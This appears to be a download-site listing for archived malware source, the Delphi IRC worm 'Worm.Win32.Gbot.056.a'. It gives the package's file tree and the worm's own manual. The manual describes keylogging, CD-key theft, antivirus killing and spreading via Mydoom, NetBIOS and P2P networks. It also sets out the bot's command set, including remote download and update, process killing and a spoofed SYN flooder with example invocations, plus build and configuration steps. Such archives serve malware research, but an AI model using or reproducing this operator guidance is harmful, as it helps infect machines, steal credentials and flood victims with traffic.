开发工具:Visual C++
上传日期:2021-02-03 15:21:02
上 传 者vxug
说明: - malware source code from vx-underground repository

Worm.Win32.Gbot.056.a\ACLUnits\ACLUTILS.PAS (59549, 2003-12-28)
Worm.Win32.Gbot.056.a\ACLUnits\REGISTRY.PAS (6813, 2004-02-29)
Worm.Win32.Gbot.056.a\ACLUnits (0, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\icon.ico (2238, 2003-05-01)
Worm.Win32.Gbot.056.a\Resources\Src\EncodeStrings.cfg (386, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources\Src\EncodeStrings.dof (1097, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources\Src\EncodeStrings.dpr (2142, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources\Src\EncodeStrings.~dpr (2109, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources\Src (0, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TAUTHHOST.ini (381, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TAuthHost.str (76, 2004-04-01)
Worm.Win32.Gbot.056.a\Resources\TAVNAME.ini (11421, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TAVName.str (3319, 2003-06-17)
Worm.Win32.Gbot.056.a\Resources\TBOT.ini (252, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TBOT.str (101, 2004-05-16)
Worm.Win32.Gbot.056.a\Resources\TCDKEYS.ini (9755, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TCDKeys.str (2067, 2004-03-05)
Worm.Win32.Gbot.056.a\Resources\TERRORMESSAGES.ini (3167, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TErrorMessages.str (599, 2003-06-14)
Worm.Win32.Gbot.056.a\Resources\TIRCSERVERS.ini (259, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TIRCServers.str (58, 2004-03-19)
Worm.Win32.Gbot.056.a\Resources\TMAIN.ini (22223, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TMain.str (5207, 2004-05-02)
Worm.Win32.Gbot.056.a\Resources\TNBLogin.ini (244, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TNBLogin.STR (64, 2003-08-08)
Worm.Win32.Gbot.056.a\Resources\TNBPASSWORD.ini (3752, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TNBPassword.str (1158, 2003-08-08)
Worm.Win32.Gbot.056.a\Resources\TP2PFILENAMES.ini (1507, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TP2PFileNames.str (303, 2004-03-14)
Worm.Win32.Gbot.056.a\Resources\TSUFFIX.ini (292, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TSuffix.str (69, 2004-02-20)
Worm.Win32.Gbot.056.a\Resources\TVERSIONS.ini (10299, 2004-07-31)
Worm.Win32.Gbot.056.a\Resources\TVersions.str (1942, 2004-04-02)
Worm.Win32.Gbot.056.a\Resources (0, 2004-07-31)
Worm.Win32.Gbot.056.a\System\Delphi5\ (41694, 2000-06-15)
Worm.Win32.Gbot.056.a\System\Delphi5\makefile (9234, 2001-09-09)
Worm.Win32.Gbot.056.a\System\Delphi5\sysinit.dcu (2973, 2001-09-09)
Worm.Win32.Gbot.056.a\System\Delphi5\sysinit.pas (8556, 2000-06-15)
Worm.Win32.Gbot.056.a\System\Delphi5\SysSfIni.dcu (567, 2001-09-09)
... ...

;-----------------------------------------------------------------------------------; ; ; ; :;;,: .,: ..... :,;;: ......... ; ; ifji;;jDt .t#: i: .;#DitGD. .fji,:;fEt tLiif#fiiLi; ; .Dj :. tE . . . ;W ,#; ,#, iW, ,#f : t# . ; ; DK Dt,iG# .ji;tWt ii;iE ;EDi, jK;;tf, ,#L #G DG ; ;:#G :;iii .#t. Gf Kj KL.Kft;: W, ,iiii Ej..,EE f#i ;#i .#i ; ; EW. fW fL .W: ;#: :W:..:,fW ;E ..... ;#: LW. ;#f :Ei tW. ; ; .fEj,:,;Df :#. jE;.:KL;;j. fG;;i, LE;: ,E#tiijj. ;DLi::;tf: ;KE; ; ; .::: .. .. ::: ; ; ; ;-----------------------------------------------------------------------------------; ; Features: ; ; - SpyBot compatible commands, ; ; - AV/FW killer, ; ; - CD-Key Stealer, ; ; - Mydoom spreader, ; ; - NetBIOS spreader, ; ; - Encrypted strings in EXE, ; ; - Web-server (, ; ; - API search engine by CRC32 (used only for important APIs), ; ; - KeyLogger (Keylog file can be download from webserver too), ; ; - P2P spreader (Kazaa, Edonkey, Morpheus, XoloX, ShareAza, LimeWire, ; ; - Prepend all .exe files in shared dirs if they are smaller than 5MB, ; ; - Support DCC SEND, DCC GET, DCC CHAT and topic commands. ; ; ; ; --------------------------------------------------------------------------------- ; ; Compile: ; ; - Run make.bat to compile the source! (Tested with Delphi 6) ; ; --------------------------------------------------------------------------------- ; ; - \System ; ; System.dcu, sysinit.dcu and so on units replacement for Delphi 6 ; ; Allows to make program size smaller onto about 9,5K. ; ; - \ACLUnits ; ; SysUtils and Registry units replacement. ; ; - \Resources ; ; Necessary Icon and INI files. ; ;-----------------------------------------------------------------------------------; COMMANDS LIST: (Note: Only the "login" command is case sensitive) -------------- login password (example: login hello) logout delete [filename] (example: delete c:\windows\temp.exe) execute [filename] (example: delete c:\windows\temp.exe) rename [origenamfile] [newfile] (example: rename c:\windows\temp.exe c:\windows\driver.exe) makedir [dirname] (example: makedir c:\test\) info (info: gives some info) killprocess [processname] (example: killprocess mcafee.exe) disconnect [sec.] (info: disconnect the bot for x sec. if sec. is not given it disconnect the bot for 30mins.) quit (info: bot quits running) download [url] [filename] (example: download c:\driver.exe) (info: Dot forget "http://" string in URL!) httpserver [Port] [root-dir] (example: httpserver 81 c:\) listprocesses (info: lists all running proccesses) op get [filename] (example: get c:\ will trigger a dcc send on the remote pc) raw [raw command] (example: raw PRIVMSG #ghostbot :hello) threads (info: will list al threads) list [path+filter] (example: list c:\*.*) cdkeys (info: search CD-Keys on server's computer) restart (info: restarts the server's computer) shutdown (info: shuts down the server's computer) ipscan [StartIP] [port] (example: ipscan 3137) stopipscan (info: stop IP scanner) uninstall (info: remove BOT) startmydoom (info: restart MyDoom spreader) stopmydoom (info: stop MyDoom spreader) startavfwkiller {info: restart AV/FW killer} stopavfwkiller {info: stop AV/FW killer} starnetbios {info: (re)start netbios spreader} stopnetbios {info: stop netbios spreader} mirccmd {example: mirccmd /msg #GhostBOT Hi!} {info: send message to victim's mIRC (if mIRC is open) redirect [input port] [host] [output port] (example: redirect 100 6667) clone [srv.] [port] [chan] [number of clones] (example: clone 6667 #abc 4) rawclones [command] (example: rawclones PRIVMSG #ABCD :hello ; info: some servers do not allow more than 1 clone) killclones (info: remove all clones) stopsyn (info: stop syn flooder) update [URL] (example: update\1.exe) (info: Dot forget "http://" string in URL!) Syn Flooder command ------------------- syn [victim] [options] Options: -S: Spoof host (0 is random (default)) -p: Separated list of dest ports (0 is random (default)) -s: Separated list of src ports (0 is random (default)) -n: Number of packets (0 is continuous (default)) -d: Delay (in ms) (default 0) Example I: syn -p 21,23,80,110 On this attack: - Victim: - Source IP: Random - Destination ports: 21 + 23 + 80 + 110 - Source ports: Random - Count: Continuous - Delay: 0 ms (no delay between packets) Example II: syn -S -p 21,80 -s 42,63 -n 1 -d 50 On this attack: - Victim: - Source IP/host: - Destination ports: 21 + 80 - Source ports: 42 + 63 - Count: 1 * Please note that 1 count will send the syn packets from every * * source port to every destination port. This means 4 packets * * will be transmited with a 1 count on this attack. * - Delay: 50 ms ;-----------------------------------------------------------------------------------; BOT SETTINGS: ------------- - Settings.ini include the main settings for compiler. - .\Resources\ (All srings inside .\resources\*.str files will be encrypted after compile): TBOT.str - Main parameters of the BOT. You can freely change them. TP2PFILENAMES.str - File names of P2P spreader. TCDKEYS.str - parameters of CD-Key stealer -> (1 KEY = 3 parameter) 1=SWAT3, <- Software name 2=WON\CDKeys, <- Registry key 3=SWAT3, <- Registry value .... TIRCSSERVERS.str - Here you can give unlimited number of IRC servers. TAUTHHOST.str - List of allowed host(s) at !login command.


